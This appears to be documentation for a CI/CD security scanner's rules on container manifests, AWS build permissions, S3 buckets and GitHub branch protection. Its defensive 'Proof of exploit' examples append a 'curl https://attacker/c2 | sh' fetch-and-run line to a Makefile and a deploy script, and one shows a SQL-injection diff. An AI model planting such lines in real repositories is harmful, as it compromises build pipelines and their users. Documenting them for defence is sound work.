How this is detected. A layer with a urls: field is fetched from whatever URL the manifest declares, not from the registry the image was pulled from. The digest is still verified after the fetch, so a passive attacker can't substitute a different blob, but an attacker who controls the URL endpoint can serve different content depending on the client (server-side cloaking) or simply take the endpoint offline to break image pulls. The rule fires on any layer whose descriptor includes a non-empty urls: array; it doesn't try to validate URL hygiene (HTTPS, allow-list of hosts) since the existence of the field alone is the policy violation.

Recommendation. Rebuild the image without foreign-layer references. The OCI / Docker spec lets a layer descriptor carry a urls: field that tells the client to pull the layer blob from an arbitrary HTTP location at image-pull time, bypassing the registry's content-addressed store. The mechanism exists for proprietary base layers (notably Windows Server base images that ship from mcr.microsoft.com) but is increasingly deprecated; modern Windows images at mcr.microsoft.com/windows/servercore:ltsc2022 no longer use it. If the foreign URL is genuinely required, host the blob inside your own registry and pin it by digest the same as any other layer.
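The detection itself reduces to a presence check on the descriptor field. A sketch (hypothetical helper; digests shortened for readability):

```python
import json

def foreign_layers(manifest_json: str) -> list:
    """Digests of layers whose descriptor carries a non-empty urls: array."""
    layers = json.loads(manifest_json).get("layers", [])
    return [layer["digest"] for layer in layers if layer.get("urls")]

manifest = json.dumps({"schemaVersion": 2, "layers": [
    {"digest": "sha256:aaa111", "urls": ["https://example.com/base.tgz"]},
    {"digest": "sha256:bbb222"}]})
print(foreign_layers(manifest))  # ['sha256:aaa111']
```

Note that the helper deliberately ignores the URL contents, mirroring the rule's stance that the mere existence of the field is the policy violation.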

Known false positives.

  • Legacy Windows Server base images (pre-Windows 11 / Server 2022) ship layers from mcr.microsoft.com with this mechanism. Suppress via ignore-file when the Windows image is intentional; the rule has no way to distinguish a Microsoft-blessed URL from any other.

Source: OCI-004 in the OCI manifest provider.

OCI-005: Image manifest is missing the image.licenses annotation LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without image.licenses an SBOM tool either has to fall back to scanning the layer contents (slow, best-effort) or simply mark the image as license: unknown in compliance reports. The same field is what container registries surface to the operator UI, so its absence also makes manual license review harder. The rule is LOW severity because a missing license is a hygiene gap rather than a security boundary, but it ratchets up SBOM quality enough that it's worth catching at scan time.

Recommendation. Stamp org.opencontainers.image.licenses with the SPDX expression for the image's contents (e.g. Apache-2.0, MIT AND Apache-2.0, Apache-2.0 WITH LLVM-exception). With docker buildx the simplest path is to add --label org.opencontainers.image.licenses=Apache-2.0 (or, for annotation-based propagation onto the manifest, --annotation manifest:org.opencontainers.image.licenses=Apache-2.0). The OCI image-spec annotation is a well-known SPDX expression carrier; downstream SBOM generators and registry UIs read it directly without needing per-tool configuration.

Known false positives.

  • Internal images that never leave a private registry and aren't subject to OSS license compliance audits may legitimately omit the annotation. Suppress via ignore-file when this is the deliberate stance.
  • Multi-license images with ambiguous coverage (e.g. a base image plus mixed-license app code) sometimes skip the annotation rather than emit a misleading single-license value. In that case, the correct fix is to emit the SPDX compound expression (MIT AND Apache-2.0); suppression is the wrong answer.

Source: OCI-005 in the OCI manifest provider.

OCI-006: Image has an excessive layer count LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Each layer is a content-addressed blob with its own registry round-trip on pull, its own caching decision, and its own potential for credential leakage (a RUN step that touched a secret leaves the secret in that layer's tar archive even if a later layer deletes it). The rule fires above 40 layers, which empirically captures the docker history blowout that happens when a Dockerfile's RUN lines don't collapse (RUN apt-get update followed by RUN apt-get install followed by RUN apt-get clean is three layers where one would do). Indexes don't have layers of their own; the rule passes on them and applies instead to each per-platform image manifest a downstream scan loads.

Recommendation. Reduce the image's layer count by collapsing adjacent RUN directives in the Dockerfile (RUN apt-get update && apt-get install ... && rm -rf /var/lib/apt/lists/* is the canonical pattern), ordering COPY lines so cache invalidation moves them as a unit, and using multi-stage builds to drop build-time-only artifacts before the final FROM. BuildKit's --squash flag flattens the result if the Dockerfile shape can't be restructured. Most well-tuned production images sit between 5 and 20 layers; anything past 40 is almost always accidental Dockerfile sprawl, not intentional layering.
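The rule's index-vs-manifest behavior described above can be sketched in a few lines (hypothetical helper, threshold as stated in the detection text):

```python
import json

MAX_LAYERS = 40  # the threshold the rule fires above

def layer_count_finding(manifest_json: str):
    """Return the layer count when it exceeds the threshold, else None.
    Image indexes carry no layers of their own and always pass."""
    manifest = json.loads(manifest_json)
    layers = manifest.get("layers")
    if layers is None:
        return None  # an index: per-platform manifests are checked separately
    return len(layers) if len(layers) > MAX_LAYERS else None

sprawl = json.dumps({"layers": [{"digest": f"sha256:{i:064x}"} for i in range(45)]})
lean = json.dumps({"layers": [{"digest": f"sha256:{i:064x}"} for i in range(12)]})
print(layer_count_finding(sprawl))  # 45
print(layer_count_finding(lean))    # None
```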

Known false positives.

  • Some legitimately large base images (CUDA / ML toolchains, fully-built distros) ship with 30-50 layers by design. Suppress via ignore-file when the layer count reflects a deliberate base-image choice rather than Dockerfile RUN-step sprawl.

Source: OCI-006 in the OCI manifest provider.

OCI-007: Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The OCI image-spec (1.0+) and Docker Distribution v2 both encode schemaVersion: 2 on every manifest. The older Docker v1 format set schemaVersion: 1 and stored the rootfs as a chain of un-addressed tarballs with the chain identity hashed end-to-end at pull time. Anything below 2 is by definition a non-content-addressed manifest. The detection is a strict equality check against schemaVersion.

Recommendation. Rebuild and re-push the image with a current builder (docker buildx build / buildah / ko) so the registry produces a v2 manifest with content-addressed layer descriptors. Docker Distribution v1 manifests predate the digest-pinned design that lets a client verify a pulled blob matches the manifest the registry served, so a v1 pull has no way to detect tampering between the registry and the runtime. Registries have been refusing v1 pushes for years (Docker Hub since 2019, GHCR / quay.io / ECR / Artifact Registry never supported them on read), but a pre-existing v1 image can still be sitting in a private registry; the rule catches it before that image gets promoted.
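The strict-equality detection described above amounts to one comparison (hypothetical helper, assuming the manifest JSON has already been parsed off disk or out of a registry response):

```python
import json

def legacy_schema(manifest_json: str) -> bool:
    """True for any manifest whose schemaVersion is not exactly 2
    (Docker v1 manifests set 1; OCI and Docker v2 both set 2)."""
    return json.loads(manifest_json).get("schemaVersion") != 2

print(legacy_schema('{"schemaVersion": 1}'))  # True
print(legacy_schema('{"schemaVersion": 2}'))  # False
```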

Known false positives.

  • Some internal Harbor / Nexus deployments still proxy legacy Docker images that haven't been rebuilt; a pull succeeds because the proxy upgrades the manifest at request time, but the on-disk JSON (if you saved it with inspect --raw) may still report the original schemaVersion. If your registry is doing this in-flight promotion you can suppress; otherwise re-run the build.

Source: OCI-007 in the OCI manifest provider.

OCI-008: Manifest references digest using unsupported hash algorithm HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The OCI image-spec mandates sha256: or sha512: for content descriptors. sha1: and md5: were never permitted by the spec but show up occasionally in mirror exports and forensic JSON; this rule catches them.

Detection scope: the config descriptor digest, every layer descriptor digest (single-image manifests), and every sub-manifest entry digest in an image index. The matcher accepts sha256: and sha512: as the only valid prefixes; anything else fires.

Recommendation. Rebuild and re-push the image so every descriptor (config, layers, sub-manifest entries) carries a sha256: digest. sha512: is also acceptable per the OCI spec, but anything weaker (md5, sha1) breaks the integrity guarantee the registry pull is supposed to provide. sha1 has had practical collisions since SHAttered (2017); md5 has had them since the early 2000s. A manifest that pins a layer by sha1 lets an attacker who can produce a colliding blob substitute a different tarball without changing the manifest; the registry's content-addressing then ratifies the substitution.
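The detection scope above (config descriptor, layer descriptors, index entries) can be sketched with one allow-list regex (hypothetical helper, not the scanner's actual matcher):

```python
import re

VALID_DIGEST = re.compile(r"^(sha256|sha512):[0-9a-f]+$")

def weak_digests(manifest: dict) -> list:
    """Digests outside the sha256/sha512 allow-list, gathered from the
    config descriptor, layer descriptors, and index sub-manifest entries."""
    descriptors = []
    if "config" in manifest:
        descriptors.append(manifest["config"])
    descriptors += manifest.get("layers", [])      # single-image manifest
    descriptors += manifest.get("manifests", [])   # image index
    return [d["digest"] for d in descriptors
            if not VALID_DIGEST.match(d.get("digest", ""))]

index = {"schemaVersion": 2,
         "manifests": [{"digest": "sha1:" + "ab" * 20}]}
image = {"schemaVersion": 2,
         "config": {"digest": "sha256:" + "a" * 64},
         "layers": [{"digest": "sha512:" + "b" * 128}]}
print(weak_digests(index))  # the sha1 digest fires
print(weak_digests(image))  # []
```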

Known false positives.

  • Test fixtures and intentionally-corrupt CTF images sometimes use degraded hashes for pedagogical reasons. Suppress on the specific path with an ignore-file when this is the deliberate shape.

Source: OCI-008 in the OCI manifest provider.

PBAC-000: PBAC enumeration failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: PBAC-000 in the AWS provider.

PBAC-001: CodeBuild project has no VPC configuration HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space where egress to the public internet is unrestricted: every package registry, CDN, and arbitrary endpoint is reachable. Inside a VPC, security-group and VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.

Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.

Source: PBAC-001 in the AWS provider.

PBAC-002: CodeBuild service role shared across multiple projects MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the blast radius: a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.

Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.

Source: PBAC-002 in the AWS provider.

PBAC-003: CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. A security-group egress rule of 0.0.0.0/0 on all ports/protocols means a compromised build can connect to any endpoint on the internet: a typosquatted package registry, a C2 server, an attacker-owned dump endpoint. Even when the build is inside a VPC (PBAC-001), this egress rule negates the network-side gating.

Recommendation. Restrict CodeBuild security-group egress to the specific endpoints builds need (package registries, artifact repositories, STS). A wildcard egress rule lets a compromised build exfiltrate to anywhere on the internet.

Source: PBAC-003 in the AWS provider.

PBAC-005: CodePipeline stage action roles mirror the pipeline role HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. When stage actions don't set their own roleArn, they fall back to the pipeline-level role, which is the union of every stage's needs. A compromise of any one stage (typically the build, which runs untrusted code) gains the deploy stage's authority, including production deploy credentials. Per-action roles cap the blast radius.

Recommendation. Give each stage action (Source, Build, Deploy) its own narrowly-scoped IAM role via roleArn on the action declaration. Sharing the pipeline-level role means a compromise of one action (e.g. a build) gains the permissions the deploy stage also needs.

Source: PBAC-005 in the AWS provider.

S3-000: S3 API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: S3-000 in the AWS provider.

S3-001: Artifact bucket public access block not fully enabled CRITICAL

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.

Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
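A sketch of what "all four settings enabled" means against the API's PublicAccessBlockConfiguration shape (hypothetical helper; treats a missing flag the same as a disabled one, which is also how the control behaves):

```python
REQUIRED_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls",
                  "BlockPublicPolicy", "RestrictPublicBuckets")

def public_access_gaps(config: dict) -> list:
    """Settings missing or disabled in a PublicAccessBlockConfiguration."""
    return [flag for flag in REQUIRED_FLAGS if not config.get(flag, False)]

print(public_access_gaps({f: True for f in REQUIRED_FLAGS}))  # []
print(public_access_gaps({"BlockPublicAcls": True}))          # the other three
```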

Source: S3-001 in the AWS provider.

S3-002: Artifact bucket server-side encryption not configured HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).

Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.

Source: S3-002 in the AWS provider.

S3-003: Artifact bucket versioning not enabled MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable; the original bytes are gone.

Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.

Source: S3-003 in the AWS provider.

S3-004: Artifact bucket access logging not enabled LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. S3 server access logging records every API operation against the bucket: who, when, which object, which method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.

Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.

Source: S3-004 in the AWS provider.

S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or an SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.

Recommendation. Add a bucket-policy Deny statement for s3:* conditioned on Bool aws:SecureTransport=false so plaintext (HTTP) requests are rejected.
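A deny statement of the shape the rule expects (bucket name hypothetical):

```json
{
  "Sid": "DenyInsecureTransport",
  "Effect": "Deny",
  "Principal": "*",
  "Action": "s3:*",
  "Resource": [
    "arn:aws:s3:::artifact-bucket",
    "arn:aws:s3:::artifact-bucket/*"
  ],
  "Condition": { "Bool": { "aws:SecureTransport": "false" } }
}
```

Both the bucket ARN and the /* object ARN are listed so the deny covers bucket-level operations (ListBucket) as well as object-level ones (GetObject, PutObject).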

Source: S3-005 in the AWS provider.

SCM-001: Default branch has no protection rule HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without a branch protection rule on the default branch, anyone with write access can force-push, delete the branch, or merge directly without review. Even when CI runs on the branch, an unprotected default branch lets a single compromised maintainer rewrite history and erase the audit trail. The check is sourced from the GitHub REST API (GET /repos/{owner}/{repo}/branches/{branch}/protection); a 404 response is itself the failure signal.

Recommendation. Add a branch protection rule on the default branch in the repository's Settings -> Branches. At minimum require pull request reviews before merging, require status checks to pass, and disable force-pushes / deletions. Match the rule to OpenSSF Scorecard's Branch-Protection thresholds for the organization's compliance baseline.

Seen in the wild.

  • Numerous post-incident reports (PyPI / RubyGems package compromises 2018-2024) trace the initial maintainer-account takeover step to the absence of branch protection: the attacker pushed a single tampered commit to the default branch, the release pipeline ran on push, the malicious build shipped to the registry within minutes, and recovery required force-pushing the audit trail itself. Branch protection turns the entire class of attack into a review-then-merge gate.

Proof of exploit.

With no protection rule on main, a single compromised maintainer credential is enough to ship a tampered build:

    git checkout main
    echo 'curl https://attacker/c2 | sh' >> Makefile
    git commit -am 'fix: tweak'
    git push origin main          # no review required
    # CI now runs the tampered build with full secret access.

Recovery needs a force-push to rewrite the trail:

    git push --force origin main  # also unprotected

A protection rule with required_pull_request_reviews set and allow_force_pushes: false blocks both the push and the rewrite without giving up an inch of velocity.

Source: SCM-001 in the SCM provider.

SCM-002: Default branch protection does not require pull request reviews HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.required_approving_review_count from the branch protection payload. Fires when the field is absent (no review requirement at all) or when the count is 0. SCM-001 covers the case where no protection rule exists; this rule scopes specifically to the review-count knob inside an existing rule.

Recommendation. In the default-branch protection rule, enable Require a pull request before merging and set the minimum approving review count to at least 1 (Scorecard's threshold for Branch-Protection's middle tier; raise to 2 for higher trust). Combine with Dismiss stale pull request approvals when new commits are pushed so a force-push doesn't carry an old approval forward.
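The two failure modes (field absent, count zero) collapse into one predicate against the protection payload (hypothetical helper, mirroring the GitHub REST shape):

```python
def insufficient_reviews(protection: dict) -> bool:
    """True when a branch-protection payload requires no approving reviews."""
    reviews = protection.get("required_pull_request_reviews")
    if reviews is None:
        return True  # no review requirement configured at all
    return reviews.get("required_approving_review_count", 0) < 1

print(insufficient_reviews({}))  # True
print(insufficient_reviews(
    {"required_pull_request_reviews":
     {"required_approving_review_count": 2}}))  # False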

Known false positives.

  • required_pull_request_reviews.bypass_pull_request_allowances is covered by SCM-018: a protection rule that requires reviews but lists every contributor in the bypass allowlist still passes this rule even though the control is unenforced in practice. Read SCM-002 + SCM-018 as a pair when auditing whether required review actually fires.

Proof of exploit.

With protection but no required reviews, a maintainer can self-approve a tampered change in two clicks:

    git checkout -b release-fix
    echo 'curl https://attacker/c2 | sh' >> deploy.sh
    git commit -am 'fix: handle edge case'
    git push origin release-fix
    gh pr create --fill
    gh pr merge --squash --auto   # no second-set-of-eyes
    # Release pipeline runs the tampered build with full
    # production secrets in scope.

Setting required_approving_review_count to >= 1 forces a separate identity to acknowledge the change before merge.

Source: SCM-002 in the SCM provider.

SCM-003: GitHub default code scanning is not enabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads state from the default code-scanning setup endpoint (GET /repos/{owner}/{repo}/code-scanning/default-setup). Fires when state is anything other than configured (not-configured, missing, or 404). This check only evaluates the default-setup endpoint. Repos running hand-authored CodeQL workflows or third-party SARIF uploads can still fail SCM-003; suppress per repo via ignore-file when that alternative coverage is intentional.

Recommendation. Enable default code scanning under the repository's Settings -> Code security -> Code scanning -> Default. The GitHub-managed CodeQL setup picks the right languages automatically and writes findings into the Code Scanning UI on every push and PR. Teams that already ship a CodeQL workflow can suppress this rule, but the default setup is the lowest-friction path for repos that don't have one.

Known false positives.

  • Repos that ship a hand-authored CodeQL workflow (or use Semgrep / Snyk / another SAST whose results land in the Code Scanning UI via SARIF upload) get the same coverage without enabling default setup. Suppress via ignore-file rather than removing the rule.

Proof of exploit.

Without code scanning, the only signal that a PR introduces (e.g.) a SQL injection or hardcoded secret comes from the human reviewer:

    - def lookup(user_id):
    -     return db.query("SELECT * FROM u WHERE id = ?", user_id)
    + def lookup(user_id):
    +     return db.query(f"SELECT * FROM u WHERE id = {user_id}")

A reviewer skimming a 400-line PR misses this. Default CodeQL setup catches the same change as a CWE-89 finding in the PR check, surfaces it inline in the diff, and blocks the merge if the protection rule wires it up as a required status check (see SCM-008).

Source: SCM-003 in the SCM provider.

SCM-004: GitHub secret scanning is not enabled HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads security_and_analysis.secret_scanning.status from the repo metadata payload. Fires when the value is anything other than enabled. Public repos have had free secret scanning since 2023; private repos require a GitHub Advanced Security license. Without secret scanning, a credential committed even briefly is recoverable from git history indefinitely.

Recommendation. Enable secret scanning under the repository's Settings -> Code security -> Secret scanning. The GitHub-managed scanner covers ~200 token patterns from major providers and runs on every push. Pair with push protection so secrets are blocked at commit time rather than caught after the fact.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. The fix is to grant the token admin scope on the repo (or re-run with a personal token from a maintainer) rather than to suppress the rule.

Seen in the wild.

  • GitGuardian's annual State of Secrets Sprawl reports find millions of fresh credential leaks per year across public GitHub commits, with the median time-to-revocation measured in days. Native secret scanning alerts the maintainer within minutes of the push, collapsing the exploitable window from days to minutes for the patterns it covers.

Source: SCM-004 in the SCM provider.

SCM-005: Dependabot security updates are not enabled MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads security_and_analysis.dependabot_security_updates.status from the repo metadata payload. Fires when the value is anything other than enabled. Without security updates, the team has to discover and triage CVEs against their dependency graph manually — a delay measured in days or weeks even on attentive teams, vs hours when the bot opens the PR for them.

Recommendation. Enable Dependabot security updates under the repository's Settings -> Code security -> Dependabot. The bot opens a PR with the minimum-required upgrade for each open advisory against an in-use dependency. Pair with version-update config (.github/dependabot.yml) so routine bumps don't rely on the security-update path.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
  • Repos that delegate dependency-update PRs to Renovate, Snyk, or another bot get equivalent coverage without Dependabot. Suppress via ignore-file rather than removing the rule.

Source: SCM-005 in the SCM provider.

SCM-006: Default branch protection does not require signed commits MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads required_signatures.enabled from the branch protection payload. Fires when the field is missing or False. Required signatures don't validate signature authenticity (the GitHub web UI does that lazily on render), but a missing signature is rejected at push time, which blocks the most common compromise pattern: a stolen personal access token used to push under the maintainer's name without their signing key.

Recommendation. In the default-branch protection rule, enable Require signed commits. Configure GPG, SSH, or S/MIME signatures for every contributor's git client (git config commit.gpgsign true plus an uploaded public key). Pair with branch protection's Restrict who can push to matching branches so only signed commits from authorized identities land on the default branch.

Source: SCM-006 in the SCM provider.

SCM-007: Default branch protection allows force-pushes HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads allow_force_pushes.enabled from the branch protection payload. Fires when the value is True. The complementary deletion-protection knob is covered by SCM-009; this rule focuses on the rewrite-history attack class because force-push is the primitive every post-incident rewrite uses to clean up after itself.

Recommendation. In the default-branch protection rule, set Allow force pushes to Disabled. Force-pushes overwrite the audit trail; an attacker who lands a malicious commit can erase evidence of it after the fact. Also set Allow deletions to Disabled so the branch itself can't be wiped.

Source: SCM-007 in the SCM provider.

SCM-008: Default branch protection does not require status checks MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads required_status_checks.contexts (or the newer checks shape) from the branch protection payload. Fires when the field is missing or the contexts list is empty. Without required checks the merge gate degrades to human-only review; SCM-002 covers the review knob, this rule covers the automated-verification knob, and both should be on for high-trust default branches.

Recommendation. In the default-branch protection rule, enable Require status checks to pass before merging and list every check the team relies on (CI build, code scanning, secret scanning, lint). Set strict: true (Require branches to be up to date before merging) so a stale base doesn't land regressions the latest checks would catch.

Known false positives.

  • The restrictions block (users / teams / apps allowed to push directly to the protected branch) is not consulted today: a rule that requires status checks but lists every contributor in the push-restrictions allowlist still passes this rule even though those identities can land code without the checks running. Audit the allowlist in the GitHub UI when this rule passes on a high-trust repo.
  • Status-check names are matched as opaque strings; a configured required check that no workflow actually emits (typo, deleted job) will still pass this rule. The check would block the merge in practice (GitHub waits for the named context forever), but the misconfiguration itself isn't visible from the protection payload.
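Both payload shapes the detection reads (the legacy contexts list and the newer checks array) can be handled by one predicate (hypothetical helper, mirroring the GitHub REST shape):

```python
def missing_status_checks(protection: dict) -> bool:
    """True when no required status-check contexts are configured,
    covering both the legacy contexts list and the newer checks shape."""
    rsc = protection.get("required_status_checks")
    if rsc is None:
        return True
    contexts = rsc.get("contexts") or [
        c["context"] for c in rsc.get("checks", [])]
    return len(contexts) == 0

print(missing_status_checks({"required_status_checks": {"contexts": []}}))  # True
print(missing_status_checks(
    {"required_status_checks": {"checks": [{"context": "ci/build"}]}}))     # False
```

Note that, per the false-positive above, the helper treats context names as opaque strings exactly as the rule does; it cannot tell a live CI context from a typo'd one.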

Source: SCM-008 in the SCM provider.

SCM-009: Default branch protection allows branch deletion HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads allow_deletions.enabled from the branch protection payload. Fires when the value is True. Pairs with SCM-007 (force-push allowed) — the two flags together cover the complete rewrite-history attack class.

Recommendation. In the default-branch protection rule, set Allow deletions to Disabled. A deleted default branch wipes every protection rule attached to it; an attacker with write access can delete the branch, recreate it from a tampered commit, and re-apply protection in a way that looks identical from the UI.

Source: SCM-009 in the SCM provider.

SCM-010: Branch protection allows administrators to bypass HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads enforce_admins.enabled from the branch protection payload. Fires when the value is False or the field is missing. Pairs with every other SCM-NNN rule that reads a branch-protection knob — without enforce_admins, those rules document intent rather than reality.

Recommendation. In the default-branch protection rule, enable Do not allow bypassing the above settings (a.k.a. Include administrators). Otherwise every other knob you set (required reviews, status checks, signed commits) becomes advisory rather than enforced. A compromised admin account is also a much shorter path to a tampered release than a compromised contributor account, so admins are exactly the identity the gate needs to apply to.

Source: SCM-010 in the SCM provider.

SCM-011: Default branch protection does not require CODEOWNERS reviews MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.require_code_owner_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 covers the bare review-count knob; this rule scopes specifically to whose review counts. The check evaluates only the protection-rule toggle; verifying that an actual CODEOWNERS file exists at .github/CODEOWNERS (and covers the right paths) is left to the recommendation, since the GitHub API surfaces the file's presence as a separate contents request the SCM provider does not fetch.

Recommendation. In the default-branch protection rule, enable Require review from Code Owners. Add a CODEOWNERS file at .github/CODEOWNERS (or docs/CODEOWNERS) mapping directories to the team or individual responsible. The GitHub UI auto-requests review from the matched owners on every PR that touches a covered path; combined with this branch-protection knob, the merge is blocked until they approve.

Known false positives.

  • Single-team repos where every contributor is a code owner of every path don't need the routing CODEOWNERS provides — but the protection knob still helps when a new team member joins. Suppress via ignore-file when the team intentionally stays flat.

Source: SCM-011 in the SCM provider.

SCM-012: Default branch protection keeps stale reviews after a push MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.dismiss_stale_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 ensures a review is required at all; this rule ensures the approval the team relies on actually corresponds to the diff being merged.

Recommendation. In the default-branch protection rule, enable Dismiss stale pull request approvals when new commits are pushed. Approvals will be cleared every time the PR head moves; the reviewer has to re-approve the latest diff before merge, closing the time-of-check / time-of-use gap an attacker can exploit by amending the branch after approval.

Source: SCM-012 in the SCM provider.

SCM-013: Default branch protection does not require conversation resolution LOW

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_conversation_resolution.enabled from the branch protection payload. Fires when the value is False or the field is missing. Severity is LOW because the rule documents process discipline rather than a structural vulnerability — but unresolved security comments are a common upstream cause of incidents.

Recommendation. In the default-branch protection rule, enable Require conversation resolution before merging. PRs cannot land until every review comment is marked resolved. The friction is small (the PR author clicks Resolve after addressing) and the payoff is concrete: review comments can't be ignored to ship faster.

Source: SCM-013 in the SCM provider.

SCM-014: Default branch protection does not require approval of the most recent push MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.require_last_push_approval from the branch protection payload. Fires when the value is False or the field is missing. Pairs with SCM-012 (dismiss stale reviews) — both close the same approval-time-of-check / merge-time-of-use gap from different angles.

Recommendation. In the default-branch protection rule, enable Require approval of the most recent reviewable push. The reviewer and the most recent pusher must be different identities; an attacker controlling one collaborator account can no longer ship a malicious diff under another collaborator's approval.

Source: SCM-014 in the SCM provider.

SCM-015: Secret scanning push protection is not enabled HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads security_and_analysis.secret_scanning_push_protection.status from the repo metadata payload. Fires when the value is anything other than enabled. Strongly paired with SCM-004 (secret scanning enabled): SCM-004 catches credentials after the push, SCM-015 stops them at the push. Both should be on for high-trust repos.

Recommendation. Enable secret scanning push protection under the repository's Settings -> Code security -> Push protection. Pushes containing matched credential patterns are refused by GitHub before the commit is accepted, so the credential never enters git history. Authors get an immediate remediation prompt; the bypass-with-justification flow preserves the audit trail when a legitimate test-case credential needs to land.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
  • Push protection covers the GitHub-managed pattern set (~200 token patterns from major providers). Custom-pattern support requires GitHub Advanced Security on private repos; public repos get the GitHub-managed set free.

Source: SCM-015 in the SCM provider.

SCM-016: Private vulnerability reporting is not enabled LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads security_and_analysis.private_vulnerability_reporting.status from the repo metadata payload. Fires when the value is anything other than enabled. Severity is LOW because the rule documents process readiness rather than a structural vulnerability — but having no private reporting channel means the next external researcher's report is either a public issue or nothing.

Recommendation. Enable private vulnerability reporting under the repository's Settings -> Code security -> Private vulnerability reporting. Researchers get a private Security tab where they can submit details directly to maintainers; the maintainers can then triage, request a CVE, coordinate disclosure timing, and merge a fix without exposing the bug publicly until ready.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
